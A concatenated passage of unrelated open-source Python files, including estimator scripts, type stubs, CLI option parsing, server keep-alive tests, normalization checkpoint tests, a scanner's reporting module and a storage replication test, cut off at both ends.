# Advance reference estimator to the segment start.
if first_index_z1 < first_index - 1:
ref_estimator.IterateSegment(flight_mode_z1, state_z1, first_index_z1,
first_index - 1, messages, modified_messages,
states, estimates)
first_index_z1 = first_index
flight_mode_z1 = ref_estimator.flight_mode
state_z1 = ref_estimator.state
# Iterate reference estimator over the current segment.
ref_estimator.IterateSegment(flight_mode_z1, state_z1, first_index,
last_index, messages, modified_messages,
states, estimates)
ref_estimator.ComputeOutputs(modified_messages, first_index, last_index,
states, estimates)
# Iterate test configurations over the current segment.
for est in test_estimators:
est.IterateSegment(flight_mode_z1, state_z1, first_index, last_index,
messages, modified_messages, states, estimates)
est.ComputeOutputs(modified_messages, first_index, last_index, states,
estimates)
def CreatePureInertialScenario(ref_estimator, name='Pure inertial'):
est = copy.deepcopy(ref_estimator)
est.name = name
est.SetAllFaults()
est.ClearImuAccelGyroFaults()
return est
def CreateGpsDropoutScenario(ref_estimator, name='Full GPS dropout'):
est = copy.deepcopy(ref_estimator)
est.name = name
est.SetGpsFaults()
return est
def main(argv):
"""Implement a simple demo for computing error CDFs."""
# Input/output flags.
gflags.DEFINE_string('input_file', None, 'Full path to wing HDF5 log file.')
gflags.MarkFlagAsRequired('input_file')
gflags.DEFINE_string('output_file', None, 'Full path to output MAT file.')
gflags.MarkFlagAsRequired('output_file')
# Segment processing flags.
gflags.DEFINE_integer('increment', 100,
'Integer number of messages between segments.')
gflags.DEFINE_integer('seg_length', 1000,
'Integer number of messages in each segment.')
# Evaluate segments over a specific time interval.
gflags.DEFINE_float('start_time', -float('inf'),
'Start time to evaluate segment errors.')
gflags.DEFINE_float('end_time', float('inf'),
'End time to evaluate segment errors.')
# Override default parameters.
gflags.DEFINE_list('params', [],
'A comma-separated list of param=value tokens, where '
'each param describes the dot path to a parameter in '
'EstimatorParams.')
gflags.RegisterValidator('params',
lambda l: all(len(s.split('=')) == 2 for s in l),
message='Invalid key=value parameter syntax.')
# Scenarios to process.
gflags.DEFINE_bool('scenario_pure_inertial', False,
'Process pure inertial scenario.')
gflags.DEFINE_bool('scenario_gps_dropout', False,
'Process GPS dropout scenario.')
# Common faults to introduce.
gflags.DEFINE_bool('fault_weather', False,
'Fault weather subsystems to avoid an assert when '
'reprocessing historical data.')
gflags.DEFINE_bool('fault_glas', False, 'Fault GLAS subsystems.')
# Specify flight for special handling.
gflags.DEFINE_string('flight', None,
'Fix known issues associated with the given flight.')
try:
argv = gflags.FLAGS(argv)
except gflags.FlagsError, e:
print '{}\nUsage: {} ARGS\n{}'.format(e, sys.argv[0], gflags.FLAGS)
sys.exit(1)
flags = gflags.FLAGS
ref_estimator = Estimator('Reference')
if flags.fault_glas:
ref_estimator.SetGlasFaults()
if flags.fault_weather:
ref_estimator.SetWeatherFaults()
for param_value in flags.params:
param, value = param_value.split('=', 1)
ref_estimator.UpdateParam(param, float(value))
test_estimators = []
if flags.scenario_pure_inertial:
test_estimators.append(CreatePureInertialScenario(ref_estimator))
if flags.scenario_gps_dropout:
test_estimators.append(CreateGpsDropoutScenario(ref_estimator))
messages = LoadMessages(flags.input_file, flight=flags.flight)
ProcessEstimatorSegments(messages, flags.increment, flags.seg_length,
ref_estimator, test_estimators)
output = ComputeEstimatorErrorCdfs(ref_estimator, test_estimators,
t0=flags.start_time, t1=flags.end_time)
SaveEstimatorErrorCdfsToMatFile(output, flags.output_file)
if __name__ == '__main__':
main(sys.argv)
|
numba_scipy/special/overloads.py | heroxbd/numba-scipy | 161 | 12685107 | import numba
import scipy.special as sc
from . import signatures
def choose_kernel(name, all_signatures):
def choice_function(*args):
for signature in all_signatures:
if args == signature:
f = signatures.name_and_types_to_pointer[(name, *signature)]
return lambda *args: f(*args)
return choice_function
def add_overloads():
for name, all_signatures in signatures.name_to_numba_signatures.items():
sc_function = getattr(sc, name)
numba.extending.overload(sc_function)(
choose_kernel(name, all_signatures)
)
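# Usage sketch (illustrative; it assumes add_overloads() has been run and that
# a signature for the chosen scipy.special function is registered in
# `signatures`):
#   import numba
#   import scipy.special as sc
#   @numba.njit
#   def jitted_gamma(x):
#       return sc.gamma(x)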
|
jasmin/protocols/cli/options.py | 2naive/jasmin | 750 | 12685109 | """Variant of cmd2's option parsing mechanism (http://www.assembla.com/wiki/show/python-cmd2)
"""
import re
import pyparsing
import optparse
class OptionParser(optparse.OptionParser):
def __init__(self, option_class=optparse.Option):
optparse.OptionParser.__init__(self, add_help_option=False, option_class=option_class)
def error(self, msg):
"""error(msg : string)
Print a usage message incorporating 'msg' to stderr and exit.
If you override this in a subclass, it should not return -- it
should either exit or raise an exception.
"""
raise optparse.OptParseError(msg)
def remaining_args(oldArgs, newArgList):
"""
Preserves the spacing originally in the argument after
the removal of options.
>>> remaining_args('-f bar bar cow', ['bar', 'cow'])
'bar cow'
"""
pattern = r'\s+'.join(re.escape(a) for a in newArgList) + r'\s*$'
matchObj = re.search(pattern, oldArgs)
return oldArgs[matchObj.start():]
def _attr_get_(obj, attr):
"""Returns an attribute's value, or None (no error) if undefined.
Analagous to .get() for dictionaries. Useful when checking for
value of options that may not have been defined on a given
method."""
try:
return getattr(obj, attr)
except AttributeError:
return None
optparse.Values.get = _attr_get_
options_defined = [] # used to distinguish --options from SQL-style --comments
def options(option_list, arg_desc="arg"):
"""Used as a decorator and passed a list of optparse-style options,
alters a method to populate its ``opts`` argument from its
raw text argument.
Example: transform
def do_something(self, arg):
into
@options([make_option('-q', '--quick', action="store_true",
help="Makes things fast")],
"source dest")
def do_something(self, arg, opts):
if opts.quick:
self.fast_button = True
"""
if not isinstance(option_list, list):
option_list = [option_list]
for opt in option_list:
options_defined.append(pyparsing.Literal(opt.get_opt_string()))
def option_setup(func):
optionParser = OptionParser()
for opt in option_list:
optionParser.add_option(opt)
optionParser.set_usage("%s [options] %s" % (func.__name__[3:], arg_desc))
optionParser._func = func
def new_func(instance, arg):
try:
opts, newArgList = optionParser.parse_args(arg.split())
newArgs = remaining_args(arg, newArgList)
arg = newArgs
except optparse.OptParseError as e:
instance.sendData(str(e))
return instance.sendData(optionParser.format_help())
return func(instance, arg, opts)
new_func.__doc__ = func.__doc__
new_func.__extended_doc__ = optionParser.format_help()
return new_func
return option_setup
|
boto3_type_annotations/boto3_type_annotations/apigatewayv2/client.py | cowboygneox/boto3_type_annotations | 119 | 12685111 | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from typing import Union
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import List
class Client(BaseClient):
def can_paginate(self, operation_name: str = None):
pass
def create_api(self, Name: str, ProtocolType: str, RouteSelectionExpression: str, ApiKeySelectionExpression: str = None, Description: str = None, DisableSchemaValidation: bool = None, Version: str = None) -> Dict:
pass
def create_api_mapping(self, ApiId: str, DomainName: str, Stage: str, ApiMappingKey: str = None) -> Dict:
pass
def create_authorizer(self, ApiId: str, AuthorizerType: str, AuthorizerUri: str, IdentitySource: List, Name: str, AuthorizerCredentialsArn: str = None, AuthorizerResultTtlInSeconds: int = None, IdentityValidationExpression: str = None, ProviderArns: List = None) -> Dict:
pass
def create_deployment(self, ApiId: str, Description: str = None, StageName: str = None) -> Dict:
pass
def create_domain_name(self, DomainName: str, DomainNameConfigurations: List = None) -> Dict:
pass
def create_integration(self, ApiId: str, IntegrationType: str, ConnectionId: str = None, ConnectionType: str = None, ContentHandlingStrategy: str = None, CredentialsArn: str = None, Description: str = None, IntegrationMethod: str = None, IntegrationUri: str = None, PassthroughBehavior: str = None, RequestParameters: Dict = None, RequestTemplates: Dict = None, TemplateSelectionExpression: str = None, TimeoutInMillis: int = None) -> Dict:
pass
def create_integration_response(self, ApiId: str, IntegrationId: str, IntegrationResponseKey: str, ContentHandlingStrategy: str = None, ResponseParameters: Dict = None, ResponseTemplates: Dict = None, TemplateSelectionExpression: str = None) -> Dict:
pass
def create_model(self, ApiId: str, Name: str, Schema: str, ContentType: str = None, Description: str = None) -> Dict:
pass
def create_route(self, ApiId: str, RouteKey: str, ApiKeyRequired: bool = None, AuthorizationScopes: List = None, AuthorizationType: str = None, AuthorizerId: str = None, ModelSelectionExpression: str = None, OperationName: str = None, RequestModels: Dict = None, RequestParameters: Dict = None, RouteResponseSelectionExpression: str = None, Target: str = None) -> Dict:
pass
def create_route_response(self, ApiId: str, RouteId: str, RouteResponseKey: str, ModelSelectionExpression: str = None, ResponseModels: Dict = None, ResponseParameters: Dict = None) -> Dict:
pass
def create_stage(self, ApiId: str, StageName: str, AccessLogSettings: Dict = None, ClientCertificateId: str = None, DefaultRouteSettings: Dict = None, DeploymentId: str = None, Description: str = None, RouteSettings: Dict = None, StageVariables: Dict = None) -> Dict:
pass
def delete_api(self, ApiId: str):
pass
def delete_api_mapping(self, ApiMappingId: str, DomainName: str):
pass
def delete_authorizer(self, ApiId: str, AuthorizerId: str):
pass
def delete_deployment(self, ApiId: str, DeploymentId: str):
pass
def delete_domain_name(self, DomainName: str):
pass
def delete_integration(self, ApiId: str, IntegrationId: str):
pass
def delete_integration_response(self, ApiId: str, IntegrationId: str, IntegrationResponseId: str):
pass
def delete_model(self, ApiId: str, ModelId: str):
pass
def delete_route(self, ApiId: str, RouteId: str):
pass
def delete_route_response(self, ApiId: str, RouteId: str, RouteResponseId: str):
pass
def delete_stage(self, ApiId: str, StageName: str):
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
pass
def get_api(self, ApiId: str) -> Dict:
pass
def get_api_mapping(self, ApiMappingId: str, DomainName: str) -> Dict:
pass
def get_api_mappings(self, DomainName: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_apis(self, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_authorizer(self, ApiId: str, AuthorizerId: str) -> Dict:
pass
def get_authorizers(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_deployment(self, ApiId: str, DeploymentId: str) -> Dict:
pass
def get_deployments(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_domain_name(self, DomainName: str) -> Dict:
pass
def get_domain_names(self, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_integration(self, ApiId: str, IntegrationId: str) -> Dict:
pass
def get_integration_response(self, ApiId: str, IntegrationId: str, IntegrationResponseId: str) -> Dict:
pass
def get_integration_responses(self, ApiId: str, IntegrationId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_integrations(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_model(self, ApiId: str, ModelId: str) -> Dict:
pass
def get_model_template(self, ApiId: str, ModelId: str) -> Dict:
pass
def get_models(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
pass
def get_route(self, ApiId: str, RouteId: str) -> Dict:
pass
def get_route_response(self, ApiId: str, RouteId: str, RouteResponseId: str) -> Dict:
pass
def get_route_responses(self, ApiId: str, RouteId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_routes(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_stage(self, ApiId: str, StageName: str) -> Dict:
pass
def get_stages(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
pass
def update_api(self, ApiId: str, ApiKeySelectionExpression: str = None, Description: str = None, DisableSchemaValidation: bool = None, Name: str = None, RouteSelectionExpression: str = None, Version: str = None) -> Dict:
pass
def update_api_mapping(self, ApiId: str, ApiMappingId: str, DomainName: str, ApiMappingKey: str = None, Stage: str = None) -> Dict:
pass
def update_authorizer(self, ApiId: str, AuthorizerId: str, AuthorizerCredentialsArn: str = None, AuthorizerResultTtlInSeconds: int = None, AuthorizerType: str = None, AuthorizerUri: str = None, IdentitySource: List = None, IdentityValidationExpression: str = None, Name: str = None, ProviderArns: List = None) -> Dict:
pass
def update_deployment(self, ApiId: str, DeploymentId: str, Description: str = None) -> Dict:
pass
def update_domain_name(self, DomainName: str, DomainNameConfigurations: List = None) -> Dict:
pass
def update_integration(self, ApiId: str, IntegrationId: str, ConnectionId: str = None, ConnectionType: str = None, ContentHandlingStrategy: str = None, CredentialsArn: str = None, Description: str = None, IntegrationMethod: str = None, IntegrationType: str = None, IntegrationUri: str = None, PassthroughBehavior: str = None, RequestParameters: Dict = None, RequestTemplates: Dict = None, TemplateSelectionExpression: str = None, TimeoutInMillis: int = None) -> Dict:
pass
def update_integration_response(self, ApiId: str, IntegrationId: str, IntegrationResponseId: str, ContentHandlingStrategy: str = None, IntegrationResponseKey: str = None, ResponseParameters: Dict = None, ResponseTemplates: Dict = None, TemplateSelectionExpression: str = None) -> Dict:
pass
def update_model(self, ApiId: str, ModelId: str, ContentType: str = None, Description: str = None, Name: str = None, Schema: str = None) -> Dict:
pass
def update_route(self, ApiId: str, RouteId: str, ApiKeyRequired: bool = None, AuthorizationScopes: List = None, AuthorizationType: str = None, AuthorizerId: str = None, ModelSelectionExpression: str = None, OperationName: str = None, RequestModels: Dict = None, RequestParameters: Dict = None, RouteKey: str = None, RouteResponseSelectionExpression: str = None, Target: str = None) -> Dict:
pass
def update_route_response(self, ApiId: str, RouteId: str, RouteResponseId: str, ModelSelectionExpression: str = None, ResponseModels: Dict = None, ResponseParameters: Dict = None, RouteResponseKey: str = None) -> Dict:
pass
def update_stage(self, ApiId: str, StageName: str, AccessLogSettings: Dict = None, ClientCertificateId: str = None, DefaultRouteSettings: Dict = None, DeploymentId: str = None, Description: str = None, RouteSettings: Dict = None, StageVariables: Dict = None) -> Dict:
pass
|
examples/tile.py | penguinflys/imgviz | 171 | 12685123 | #!/usr/bin/env python
import matplotlib.pyplot as plt
import imgviz
def tile():
data = imgviz.data.arc2017()
rgb = data["rgb"]
bboxes = data["bboxes"].astype(int)
masks = data["masks"] == 1
crops = []
for bbox, mask in zip(bboxes, masks):
slice_ = slice(bbox[0], bbox[2]), slice(bbox[1], bbox[3])
rgb_crop = rgb[slice_]
mask_crop = mask[slice_]
crops.append(rgb_crop * mask_crop[:, :, None])
tiled = imgviz.tile(imgs=crops, border=(255, 255, 255))
# -------------------------------------------------------------------------
plt.figure(dpi=200)
plt.subplot(121)
plt.title("original")
plt.imshow(rgb)
plt.axis("off")
plt.subplot(122)
plt.title("instances")
plt.imshow(tiled)
plt.axis("off")
img = imgviz.io.pyplot_to_numpy()
plt.close()
return img
if __name__ == "__main__":
from base import run_example
run_example(tile)
|
inceptor/engine/component/UnookComponent.py | whitefi/inceptor | 743 | 12685130 | from config.Config import Config
from engine.component.TemplateModuleComponent import TemplateModuleComponent
class UnhookComponent(TemplateModuleComponent):
def __init__(self, code=None):
placeholder = Config().get("PLACEHOLDERS", "UNHOOK")
super().__init__(code, placeholder)
|
stix_shifter_modules/error_test/stix_translation/results_translator.py | pyromaneact/stix-shifter | 129 | 12685159 | from stix_shifter_utils.modules.base.stix_translation.base_results_translator import BaseResultTranslator
from stix_shifter_utils.stix_translation.src.utils.exceptions import TranslationResultException
import json
import uuid
ERROR_TYPE_TRANSLATE_EXCEPTION = 'translate_exception'
class ResultsTranslator(BaseResultTranslator):
def read_json(self, filepath, options):
return '{}'
def translate_results(self, data_source, data):
error_type = self.options.get('error_type')
if self.options.get('error_type') == ERROR_TYPE_TRANSLATE_EXCEPTION:
raise TranslationResultException("Test exception in translate_results")
# Wrap data in a STIX bundle and insert the data_source identity object as the first object
bundle = {
"type": "bundle",
"id": "bundle--" + str(uuid.uuid4()),
"objects": []
}
data_source = json.loads(data_source)
bundle['objects'] += [data_source]
# Data is already STIX and we don't want to touch it
bundle_data = json.loads(data)
for obs in bundle_data:
obs["created_by_ref"] = data_source['id']
bundle['objects'] += bundle_data
return bundle
|
config.py | ZevranGong/webserver | 125 | 12685160 | WTF_CSRF_ENABLED = True
SECRET_KEY = 'you-will-never-guess' |
tests/trio/test_keep_alive.py | ai-mocap/hypercorn | 264 | 12685176 | <reponame>ai-mocap/hypercorn<gh_stars>100-1000
from __future__ import annotations
from typing import Callable, Generator
import h11
import pytest
import trio
from hypercorn.config import Config
from hypercorn.trio.tcp_server import TCPServer
from hypercorn.typing import Scope
from ..helpers import MockSocket
KEEP_ALIVE_TIMEOUT = 0.01
REQUEST = h11.Request(method="GET", target="/", headers=[(b"host", b"hypercorn")])
async def slow_framework(scope: Scope, receive: Callable, send: Callable) -> None:
while True:
event = await receive()
if event["type"] == "http.disconnect":
break
elif event["type"] == "lifespan.startup":
await send({"type": "lifspan.startup.complete"})
elif event["type"] == "lifespan.shutdown":
await send({"type": "lifspan.shutdown.complete"})
elif event["type"] == "http.request" and not event.get("more_body", False):
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [(b"content-length", b"0")],
}
)
await send({"type": "http.response.body", "body": b"", "more_body": False})
break
@pytest.fixture(name="client_stream", scope="function")
def _client_stream(
nursery: trio._core._run.Nursery,
) -> Generator[trio.testing._memory_streams.MemorySendStream, None, None]:
config = Config()
config.keep_alive_timeout = KEEP_ALIVE_TIMEOUT
client_stream, server_stream = trio.testing.memory_stream_pair()
server_stream.socket = MockSocket()
server = TCPServer(slow_framework, config, server_stream)
nursery.start_soon(server.run)
yield client_stream
@pytest.mark.trio
async def test_http1_keep_alive_pre_request(
client_stream: trio.testing._memory_streams.MemorySendStream,
) -> None:
await client_stream.send_all(b"GET")
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
# Only way to confirm closure is to invoke an error
with pytest.raises(trio.BrokenResourceError):
await client_stream.send_all(b"a")
@pytest.mark.trio
async def test_http1_keep_alive_during(
client_stream: trio.testing._memory_streams.MemorySendStream,
) -> None:
client = h11.Connection(h11.CLIENT)
await client_stream.send_all(client.send(REQUEST))
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
# Key is that this doesn't error
await client_stream.send_all(client.send(h11.EndOfMessage()))
@pytest.mark.trio
async def test_http1_keep_alive(
client_stream: trio.testing._memory_streams.MemorySendStream,
) -> None:
client = h11.Connection(h11.CLIENT)
await client_stream.send_all(client.send(REQUEST))
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
await client_stream.send_all(client.send(h11.EndOfMessage()))
while True:
event = client.next_event()
if event == h11.NEED_DATA:
data = await client_stream.receive_some(2 ** 16)
client.receive_data(data)
elif isinstance(event, h11.EndOfMessage):
break
client.start_next_cycle()
await client_stream.send_all(client.send(REQUEST))
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
# Key is that this doesn't error
await client_stream.send_all(client.send(h11.EndOfMessage()))
@pytest.mark.trio
async def test_http1_keep_alive_pipelining(
client_stream: trio.testing._memory_streams.MemorySendStream,
) -> None:
await client_stream.send_all(
b"GET / HTTP/1.1\r\nHost: hypercorn\r\n\r\nGET / HTTP/1.1\r\nHost: hypercorn\r\n\r\n"
)
await client_stream.receive_some(2 ** 16)
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
await client_stream.send_all(b"")
|
tests/nn/checkpoint/test_checkpoint_activations_norm.py | zhaojuanmao/fairscale | 1,662 | 12685186 | # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
# pylint: disable=missing-module-docstring
# pylint: disable=missing-class-docstring
# pylint: disable=missing-function-docstring
""" Test checkpoint_wrapper with normalization layers. """
import pytest
import torch
from torch.nn import BatchNorm2d, LayerNorm, Linear, Sequential
from torch.optim import SGD
from fairscale.nn.checkpoint.checkpoint_activations import checkpoint_wrapper
from fairscale.utils import torch_version
from fairscale.utils.testing import objects_are_equal
NORM_TYPES = [LayerNorm, BatchNorm2d]
MP_TYPES = ["fp32", "fp16", "call_half"]
def get_model(norm_type, checkpointed, mixed_precision):
assert norm_type in NORM_TYPES, norm_type
assert checkpointed in [True, False], checkpointed
assert mixed_precision in MP_TYPES
model = Sequential(Linear(3, 2), norm_type(2))
if mixed_precision == "fp16":
# Set param.data and buffers as fp16
for p in model.parameters():
p.data = p.data.half()
for m in model:
for n, b in m.named_buffers():
setattr(m, n, b.half())
elif mixed_precision == "call_half":
model.half()
if checkpointed:
model = checkpoint_wrapper(model)
return model
@pytest.mark.parametrize("device", ["cpu", "cuda"])
@pytest.mark.parametrize("norm_type", NORM_TYPES)
@pytest.mark.parametrize("mixed_precision", MP_TYPES)
def test_norm(device, norm_type, mixed_precision):
"""Test checkpoint_wrapper with different norm layers."""
if device == "cuda" and not torch.cuda.is_available():
pytest.skip("Skip due to lack of GPU")
# Get input, ref, checkpoint models and make them equal.
in_data = torch.rand(2, 2, 3, 3).to(device)
m_ref = get_model(norm_type, False, mixed_precision).to(device)
m_cpt = get_model(norm_type, True, mixed_precision).to(device)
m_cpt.load_state_dict(m_ref.state_dict())
if torch_version() >= (1, 6, 0):
# This assert fails on 1.5.1.
assert objects_are_equal(m_ref.state_dict(), m_cpt.state_dict())
if mixed_precision != "fp32":
in_data = in_data.half()
# Needed due to checkpointing.
in_data.requires_grad = True
for model in (m_ref, m_cpt):
optim = SGD(model.parameters(), lr=0.1)
if device == "cpu" and mixed_precision != "fp32":
# Got: RuntimeError: "batch_norm"/"layer_norm" not implemented for 'Half'.
with pytest.raises(RuntimeError):
out = model(in_data)
return
else:
# Everything else work.
out = model(in_data)
out.sum().backward()
optim.step()
if torch_version() >= (1, 6, 0):
assert objects_are_equal(m_ref.state_dict(), m_cpt.state_dict())
|
yawast/reporting/reporter.py | Prodject/yawast | 200 | 12685187 | # Copyright (c) 2013 - 2019 <NAME> and Contributors.
# This file is part of YAWAST which is released under the MIT license.
# See the LICENSE file or go to https://yawast.org/license/ for full license details.
import gc
import hashlib
import json
import os
import time
import zipfile
from datetime import datetime
from typing import Dict, List, cast, Optional, Any, Union
from yawast.external.memory_size import Size
from yawast.external.total_size import total_size
from yawast.reporting.enums import Vulnerabilities, Severity
from yawast.reporting.issue import Issue
from yawast.scanner.plugins.result import Result
from yawast.shared import output
from yawast.shared.exec_timer import ExecutionTimer
_issues: Dict[str, Dict[Vulnerabilities, List[Issue]]] = {}
_info: Dict[str, Any] = {}
_data: Dict[str, Any] = {}
_evidence: Dict[str, Any] = {}
_domain: str = ""
_output_file: str = ""
def init(output_file: Union[str, None] = None) -> None:
global _output_file
if output_file is not None:
# if we have something, let's figure out what
output_file = os.path.abspath(output_file)
if os.path.isdir(output_file):
# it's a directory, so we are going to create a name
name = f"yawast_{int(time.time())}.json"
output_file = os.path.join(output_file, name)
elif os.path.isfile(output_file) or os.path.isfile(f"{_output_file}.zip"):
# the file already exists
print("WARNING: Output file already exists; it will be replaced.")
_output_file = output_file
def save_output(spinner=None):
# add some extra debug data
register_info("memsize_issues", total_size(_issues))
register_info("memsize_info", total_size(_info))
register_info("memsize_data", total_size(_data))
register_info("memsize_evidence", total_size(_evidence))
register_info("gc_stats", gc.get_stats())
register_info("gc_objects", len(gc.get_objects()))
if spinner:
spinner.stop()
print("Saving...")
if spinner:
spinner.start()
vulns = {}
for vuln in Vulnerabilities:
vulns[vuln.name] = {
"severity": vuln.severity,
"description": vuln.description,
"id": vuln.id,
}
data = {
"_info": _convert_keys(_info),
"data": _convert_keys(_data),
"issues": _convert_keys(_issues),
"evidence": _convert_keys(_evidence),
"vulnerabilities": vulns,
}
json_data = json.dumps(data, indent=4)
try:
zf = zipfile.ZipFile(f"{_output_file}.zip", "x", zipfile.ZIP_BZIP2)
with ExecutionTimer() as tm:
zf.writestr(
f"{os.path.basename(_output_file)}",
json_data.encode("utf_8", "backslashreplace"),
)
zf.close()
orig = "{0:cM}".format(Size(len(json_data)))
comp = "{0:cM}".format(Size(os.path.getsize(f"{_output_file}.zip")))
if spinner:
spinner.stop()
print(
f"Saved {_output_file}.zip (size reduced from {orig} to {comp} in {tm.to_ms()}ms)"
)
except Exception as error:
if spinner:
spinner.stop()
print(f"Error writing output file: {error}")
def get_output_file() -> str:
if len(_output_file) > 0:
return f"{_output_file}.zip"
else:
return ""
def setup(domain: str) -> None:
global _domain
_domain = domain
if _domain not in _issues:
_issues[_domain] = {}
if _domain not in _data:
_data[_domain] = {}
if _domain not in _evidence:
_evidence[_domain] = {}
def is_registered(vuln: Vulnerabilities) -> bool:
if _issues is None:
return False
else:
if _domain in _issues:
if _issues[_domain].get(vuln) is None:
return False
else:
return True
else:
return False
def register_info(key: str, value: Any):
if _output_file is not None and len(_output_file) > 0:
_info[key] = value
def register_data(key: str, value: Any):
if _output_file is not None and len(_output_file) > 0:
if _domain is not None:
if _domain in _data:
_register_data(_data[_domain], key, value)
else:
_data[_domain] = {}
_register_data(_data[_domain], key, value)
else:
_register_data(_data, key, value)
def register_message(value: str, kind: str):
if _output_file is not None and len(_output_file) > 0:
if "messages" not in _info:
_info["messages"] = {}
if kind not in _info["messages"]:
_info["messages"][kind] = []
_info["messages"][kind].append(f"[{datetime.utcnow()} UTC]: {value}")
def register(issue: Issue) -> None:
# make sure the Dict for _domain exists - this shouldn't normally be an issue, but is for unit tests
if _domain not in _issues:
_issues[_domain] = {}
# add the evidence to the evidence list, and swap the value in the object for its hash.
# the point of this is to minimize cases where we are holding the same (large) string
# multiple times in memory. should reduce memory by up to 20%
if _domain not in _evidence:
_evidence[_domain] = {}
if "request" in issue.evidence and issue.evidence["request"] is not None:
req = str(issue.evidence["request"]).encode("utf-8")
req_id = hashlib.blake2b(req, digest_size=16).hexdigest()
if req_id not in _evidence[_domain]:
_evidence[_domain][req_id] = issue.evidence["request"]
issue.evidence["request"] = req_id
if "response" in issue.evidence and issue.evidence["response"] is not None:
res = str(issue.evidence["response"]).encode("utf-8")
res_id = hashlib.blake2b(res, digest_size=16).hexdigest()
if res_id not in _evidence[_domain]:
_evidence[_domain][res_id] = issue.evidence["response"]
issue.evidence["response"] = res_id
# if we haven't handled this issue yet, create a List for it
if not is_registered(issue.vulnerability):
_issues[_domain][issue.vulnerability] = []
# we need to check to see if we already have this issue, for this URL, so we don't create dups
# TODO: This isn't exactly efficient - refactor
findings = _issues[_domain][issue.vulnerability]
findings = cast(List[Issue], findings)
for finding in findings:
if finding.url == issue.url and finding.evidence == issue.evidence:
# just bail out
output.debug(f"Duplicate Issue: {issue.id} (duplicate of {finding.id})")
return
_issues[_domain][issue.vulnerability].append(issue)
def display(msg: str, issue: Issue) -> None:
if issue.vulnerability.display_all or not is_registered(issue.vulnerability):
if issue.severity == Severity.CRITICAL or issue.severity == Severity.HIGH:
output.vuln(msg)
elif issue.severity == Severity.MEDIUM:
output.warn(msg)
else:
output.info(msg)
# if there's no evidence, default to the msg - better than nothing
if issue.evidence is None:
issue.evidence = msg.strip()
register(issue)
def display_results(results: List[Result], padding: Optional[str] = ""):
for res in results:
iss = Issue.from_result(res)
display(f"{padding}{res.message}", iss)
def _register_data(data: Dict, key: str, value: Any):
if key in data and isinstance(data[key], list) and isinstance(value, list):
ls = cast(list, data[key])
ls.extend(value)
elif key in data and isinstance(data[key], dict) and isinstance(value, dict):
dt = cast(dict, data[key])
dt.update(value)
else:
data[key] = value
def _convert_keys(dct: Dict) -> Dict:
ret = {}
for k, v in dct.items():
if isinstance(k, Vulnerabilities):
k = k.name
if isinstance(v, dict):
v = _convert_keys(v)
try:
_ = json.dumps(v)
except Exception as error:
output.debug(f"Error serializing data: {str(error)}")
# convert to string - this may be wrong, but at least it won't fail
v = str(v)
ret[k] = v
return ret
|
cinder/tests/unit/volume/drivers/dell_emc/unity/test_replication.py | helenwalsh/cinder | 571 | 12685203 | <filename>cinder/tests/unit/volume/drivers/dell_emc/unity/test_replication.py
# Copyright (c) 2016 - 2019 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
import ddt
from cinder import exception
from cinder.volume import configuration as conf
from cinder.volume.drivers.dell_emc.unity import adapter as unity_adapter
from cinder.volume.drivers.dell_emc.unity import driver
from cinder.volume.drivers.dell_emc.unity import replication
from cinder.volume.drivers.san.san import san_opts
@ddt.ddt
class UnityReplicationTest(unittest.TestCase):
@ddt.data({'version': '1.0.0', 'protocol': 'FC',
'expected': unity_adapter.FCAdapter},
{'version': '2.0.0', 'protocol': 'iSCSI',
'expected': unity_adapter.ISCSIAdapter})
@ddt.unpack
def test_init_adapter(self, version, protocol, expected):
a = replication.init_adapter(version, protocol)
self.assertIsInstance(a, expected)
self.assertEqual(version, a.version)
@ddt.ddt
class UnityReplicationDeviceTest(unittest.TestCase):
def setUp(self):
self.config = conf.Configuration(san_opts,
config_group='unity-backend')
self.config.san_ip = '1.1.1.1'
self.config.san_login = 'user1'
self.config.san_password = '<PASSWORD>'
self.driver = driver.UnityDriver(configuration=self.config)
conf_dict = {'backend_id': 'secondary_unity', 'san_ip': '2.2.2.2'}
self.mock_adapter = mock.MagicMock(is_setup=False)
def mock_do_setup(*args):
self.mock_adapter.is_setup = True
self.mock_adapter.do_setup = mock.MagicMock(side_effect=mock_do_setup)
with mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.init_adapter',
return_value=self.mock_adapter):
self.replication_device = replication.ReplicationDevice(
conf_dict, self.driver)
@ddt.data(
{
'conf_dict': {
'backend_id': 'secondary_unity',
'san_ip': '2.2.2.2'
},
'expected': [
'secondary_unity', '2.2.2.2', 'user1', '<PASSWORD>', 60
]
},
{
'conf_dict': {
'backend_id': 'secondary_unity',
'san_ip': '2.2.2.2',
